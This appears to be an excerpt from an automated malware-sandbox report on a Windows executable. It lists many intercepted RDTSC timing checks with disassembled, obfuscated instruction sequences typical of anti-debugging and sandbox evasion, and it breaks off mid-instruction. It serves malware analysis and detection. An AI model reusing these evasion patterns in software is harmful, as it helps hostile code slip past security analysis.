Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 78084A second address: 780865 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F292CD65AB7h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 780865 second address: 78087B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F292CD152EDh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 793083 second address: 793087 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 791A4B second address: 791A50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 791A50 second address: 791A55 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7932E7 second address: 7932ED instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7932ED second address: 7932F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007F292CD65AA6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7932F7 second address: 79335E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a jmp 00007F292CD152F2h 0x0000000f jmp 00007F292CD152EDh 0x00000014 popad 0x00000015 mov eax, dword ptr [esp+04h] 0x00000019 pushad 0x0000001a jng 00007F292CD152ECh 0x00000020 jl 00007F292CD152E6h 0x00000026 jg 00007F292CD152ECh 0x0000002c popad 0x0000002d mov eax, dword ptr [eax] 0x0000002f jmp 00007F292CD152F4h 0x00000034 mov dword ptr [esp+04h], eax 0x00000038 push eax 0x00000039 push edx 0x0000003a pushad 0x0000003b push eax 0x0000003c push edx 0x0000003d rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 79335E second address: 793369 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F292CD65AA6h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 794710 second address: 794724 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F292CD152F0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 794724 second address: 79472A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 79472A second address: 79472E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 79472E second address: 79474D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b jmp 00007F292CD65AB2h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 79474D second address: 794762 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F292CD152F0h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 794762 second address: 794767 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 794767 second address: 794784 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F292CD152F7h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 79BEDA second address: 79BEDE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 79BEDE second address: 79BEE2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 79BF8D second address: 79BF94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 79BF94 second address: 79BFAE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnl 00007F292CD152E6h 0x00000009 jns 00007F292CD152E6h 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 mov dword ptr [esp+04h], eax 0x00000016 push eax 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 79C591 second address: 79C595 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 79C756 second address: 79C75B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 79C75B second address: 79C761 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 79CD2B second address: 79CD2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 79CEEA second address: 79CEEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 79D8ED second address: 79D8F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 79FFB0 second address: 79FFBA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007F292CD65AA6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 79FFBA second address: 79FFBE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7A0902 second address: 7A0940 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F292CD65AACh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F292CD65AB4h 0x0000000e popad 0x0000000f nop 0x00000010 add dword ptr [ebp+122D185Eh], ecx 0x00000016 push 00000000h 0x00000018 xor edi, dword ptr [ebp+122D294Bh] 0x0000001e push 00000000h 0x00000020 movzx edi, cx 0x00000023 xchg eax, ebx 0x00000024 push edi 0x00000025 pushad 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7A0940 second address: 7A0970 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F292CD152F8h 0x00000009 popad 0x0000000a pop edi 0x0000000b push eax 0x0000000c pushad 0x0000000d push ebx 0x0000000e jc 00007F292CD152E6h 0x00000014 pop ebx 0x00000015 push eax 0x00000016 push edx 0x00000017 jne 00007F292CD152E6h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7A06EF second address: 7A070C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F292CD65AB9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7A1E54 second address: 7A1E58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7A1E58 second address: 7A1E5C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7A1E5C second address: 7A1EDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push 00000000h 0x0000000b push edx 0x0000000c call 00007F292CD152E8h 0x00000011 pop edx 0x00000012 mov dword ptr [esp+04h], edx 0x00000016 add dword ptr [esp+04h], 00000015h 0x0000001e inc edx 0x0000001f push edx 0x00000020 ret 0x00000021 pop edx 0x00000022 ret 0x00000023 mov esi, dword ptr [ebp+122D1A29h] 0x00000029 push 00000000h 0x0000002b push 00000000h 0x0000002d push edi 0x0000002e call 00007F292CD152E8h 0x00000033 pop edi 0x00000034 mov dword ptr [esp+04h], edi 0x00000038 add dword ptr [esp+04h], 00000019h 0x00000040 inc edi 0x00000041 push edi 0x00000042 ret 0x00000043 pop edi 0x00000044 ret 0x00000045 pushad 0x00000046 mov dword ptr [ebp+122D30F0h], ecx 0x0000004c mov dx, 8F46h 0x00000050 popad 0x00000051 jmp 00007F292CD152F8h 0x00000056 xchg eax, ebx 0x00000057 jo 00007F292CD152F8h 0x0000005d push eax 0x0000005e push edx 0x0000005f push eax 0x00000060 push edx 0x00000061 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A1EDA second address: 7A1EDE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A1EDE second address: 7A1EF7 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F292CD152E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F292CD152ECh 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A270D second address: 7A2713 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A5699 second address: 7A569D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A569D second address: 7A56A1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A56A1 second address: 7A56BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jng 00007F292CD152ECh 0x0000000c popad 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 jnc 00007F292CD152E6h 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A56BF second address: 7A56C3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A56C3 second address: 7A56C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A5BBA second address: 7A5C34 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F292CD65AB7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push esi 0x0000000d call 00007F292CD65AA8h 0x00000012 pop esi 0x00000013 mov dword ptr [esp+04h], esi 0x00000017 add dword ptr [esp+04h], 00000014h 0x0000001f inc esi 0x00000020 push esi 0x00000021 ret 0x00000022 pop esi 0x00000023 ret 0x00000024 mov ebx, eax 0x00000026 push 00000000h 0x00000028 jnl 00007F292CD65AACh 0x0000002e push 00000000h 0x00000030 push 00000000h 0x00000032 push esi 0x00000033 call 00007F292CD65AA8h 0x00000038 pop esi 0x00000039 mov dword ptr [esp+04h], esi 0x0000003d add dword ptr [esp+04h], 0000001Dh 0x00000045 inc esi 0x00000046 push esi 0x00000047 ret 0x00000048 pop esi 0x00000049 ret 0x0000004a mov bx, 1A72h 0x0000004e push eax 0x0000004f push eax 0x00000050 push edx 0x00000051 push eax 0x00000052 push edx 0x00000053 pushad 0x00000054 popad 0x00000055 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A5C34 second address: 7A5C38 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A5C38 second address: 7A5C3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7AA28D second address: 7AA2A4 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jmp 00007F292CD152F1h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 758895 second address: 758899 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7AAAD9 second address: 7AAADD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 758899 second address: 7588BA instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F292CD65AA6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ebx 0x0000000d pushad 0x0000000e jmp 00007F292CD65AB1h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7AAADD second address: 7AAAF9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F292CD152EBh 0x0000000b popad 0x0000000c push eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 jnp 00007F292CD152E6h 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7588BA second address: 7588C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7AAAF9 second address: 7AAB03 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7AAB03 second address: 7AAB07 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7AE1C6 second address: 7AE235 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F292CD152F6h 0x00000008 jng 00007F292CD152E6h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push ecx 0x00000013 push eax 0x00000014 pushad 0x00000015 popad 0x00000016 pop eax 0x00000017 pop ecx 0x00000018 nop 0x00000019 push 00000000h 0x0000001b push ebx 0x0000001c call 00007F292CD152E8h 0x00000021 pop ebx 0x00000022 mov dword ptr [esp+04h], ebx 0x00000026 add dword ptr [esp+04h], 0000001Ch 0x0000002e inc ebx 0x0000002f push ebx 0x00000030 ret 0x00000031 pop ebx 0x00000032 ret 0x00000033 ja 00007F292CD152ECh 0x00000039 push 00000000h 0x0000003b mov dword ptr [ebp+122D2A7Dh], ebx 0x00000041 push 00000000h 0x00000043 mov ebx, 52BE9404h 0x00000048 xchg eax, esi 0x00000049 push edi 0x0000004a push eax 0x0000004b push edx 0x0000004c push eax 0x0000004d push edx 0x0000004e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7AE235 second address: 7AE239 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7AE239 second address: 7AE25C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F292CD152F8h 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7AF1D9 second address: 7AF248 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F292CD65AB5h 0x0000000e nop 0x0000000f push 00000000h 0x00000011 push ebp 0x00000012 call 00007F292CD65AA8h 0x00000017 pop ebp 0x00000018 mov dword ptr [esp+04h], ebp 0x0000001c add dword ptr [esp+04h], 0000001Bh 0x00000024 inc ebp 0x00000025 push ebp 0x00000026 ret 0x00000027 pop ebp 0x00000028 ret 0x00000029 push 00000000h 0x0000002b mov bl, 96h 0x0000002d push 00000000h 0x0000002f mov bl, 97h 0x00000031 call 00007F292CD65AB3h 0x00000036 mov edi, dword ptr [ebp+122D390Bh] 0x0000003c pop ebx 0x0000003d push eax 0x0000003e jo 00007F292CD65AB0h 0x00000044 push eax 0x00000045 push edx 0x00000046 pushad 0x00000047 popad 0x00000048 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7AF375 second address: 7AF382 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F292CD152E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B115E second address: 7B1168 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B1168 second address: 7B11A2 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a mov bh, 6Bh 0x0000000c movzx ebx, dx 0x0000000f push 00000000h 0x00000011 mov ebx, dword ptr [ebp+122D19B2h] 0x00000017 push 00000000h 0x00000019 mov ebx, dword ptr [ebp+122D39E3h] 0x0000001f push eax 0x00000020 push eax 0x00000021 push edx 0x00000022 jnl 00007F292CD152F8h 0x00000028 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B0313 second address: 7B0317 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B0317 second address: 7B031B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B72BC second address: 7B72E9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 ja 00007F292CD65AA6h 0x00000009 jmp 00007F292CD65AB2h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 jg 00007F292CD65AACh 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B92EA second address: 7B9307 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F292CD152F5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B9307 second address: 7B930B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B930B second address: 7B9327 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push esi 0x0000000b jmp 00007F292CD152F0h 0x00000010 pop esi 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B9327 second address: 7B932C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B932C second address: 7B9388 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a mov ebx, dword ptr [ebp+122D1CAAh] 0x00000010 push 00000000h 0x00000012 push 00000000h 0x00000014 push 00000000h 0x00000016 push edi 0x00000017 call 00007F292CD152E8h 0x0000001c pop edi 0x0000001d mov dword ptr [esp+04h], edi 0x00000021 add dword ptr [esp+04h], 00000018h 0x00000029 inc edi 0x0000002a push edi 0x0000002b ret 0x0000002c pop edi 0x0000002d ret 0x0000002e mov ebx, edx 0x00000030 mov edi, dword ptr [ebp+122D2B6Dh] 0x00000036 jmp 00007F292CD152F0h 0x0000003b push eax 0x0000003c push eax 0x0000003d push edx 0x0000003e jmp 00007F292CD152EDh 0x00000043 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B9388 second address: 7B9392 instructions: 0x00000000 rdtsc 0x00000002 js 00007F292CD65AACh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B32EC second address: 7B3301 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 jne 00007F292CD152E6h 0x0000000e jno 00007F292CD152E6h 0x00000014 popad 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B426C second address: 7B4270 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B6388 second address: 7B638D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B7533 second address: 7B7539 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B7539 second address: 7B753D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B753D second address: 7B7541 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B8546 second address: 7B854D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B854D second address: 7B8552 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B8614 second address: 7B8618 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B95B9 second address: 7B95BE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BD781 second address: 7BD78B instructions: 0x00000000 rdtsc 0x00000002 jng 00007F292CD152ECh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C22ED second address: 7C22F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C22F2 second address: 7C22F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C22F8 second address: 7C22FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C258D second address: 7C25A5 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F292CD152E6h 0x00000008 jnp 00007F292CD152E6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jp 00007F292CD152E6h 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C88D7 second address: 7C88DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop ebx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7CABAE second address: 7CABB4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7CABB4 second address: 7CABC5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F292CD65AADh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7CACA2 second address: 7CACA8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7CAE18 second address: 5EFC67 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F292CD65AA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b xor dword ptr [esp], 4348974Ah 0x00000012 clc 0x00000013 push dword ptr [ebp+122D169Dh] 0x00000019 ja 00007F292CD65AB3h 0x0000001f call dword ptr [ebp+122D2B67h] 0x00000025 pushad 0x00000026 jnl 00007F292CD65AB0h 0x0000002c pushad 0x0000002d mov si, 008Ch 0x00000031 mov dx, 773Dh 0x00000035 popad 0x00000036 xor eax, eax 0x00000038 jmp 00007F292CD65AB0h 0x0000003d mov edx, dword ptr [esp+28h] 0x00000041 mov dword ptr [ebp+122D318Bh], edi 0x00000047 mov dword ptr [ebp+122D3B33h], eax 0x0000004d mov dword ptr [ebp+122D3442h], eax 0x00000053 cmc 0x00000054 mov esi, 0000003Ch 0x00000059 jng 00007F292CD65AAEh 0x0000005f add esi, dword ptr [esp+24h] 0x00000063 js 00007F292CD65AACh 0x00000069 mov dword ptr [ebp+122D318Bh], ecx 0x0000006f lodsw 0x00000071 cmc 0x00000072 add eax, dword ptr [esp+24h] 0x00000076 jmp 